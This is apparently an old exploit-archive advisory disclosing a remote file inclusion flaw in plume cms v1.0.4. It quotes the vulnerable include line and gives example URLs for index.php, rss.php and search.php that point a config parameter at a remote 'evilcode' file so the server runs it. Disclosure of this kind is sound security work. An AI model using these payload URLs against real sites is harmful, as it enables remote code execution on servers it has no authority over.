plume-cms v1.0.4 Multiple Remote File include

2006.07.14
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

plume cms v1.0.4 Multiple Remote File include ------------------------------------------------- Discovered By CrAsh_oVeR_rIdE Arabian Security Team ------------------------------------------------- site of script:http://www.plume-cms.net/ ------------------------------------------------- Vulnerable: plume cms v1.0.4 ------------------------------------------------- vulnerable code: ---------------------- include $_PX_config['manager_path'].'/frontinc/class.template.php'; _PX_config[manager_path] parameter File include ------------------------------------------------------------------------ ----------------------------------------------------------------- vulnerable files : -------------------- index.php rss.php search.php ------------------------------------------------- example: www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcod e.txt? www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode. txt? www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilco de.txt? ------------------------------------------------- Discovered By CrAsh_oVeR_rIdE E-mail:KARKOR23 (at) hotmail (dot) com [email concealed] Site:www.lezr.com Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM OKAN3, mr-hcr AND ALL LEZR.COM Member


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top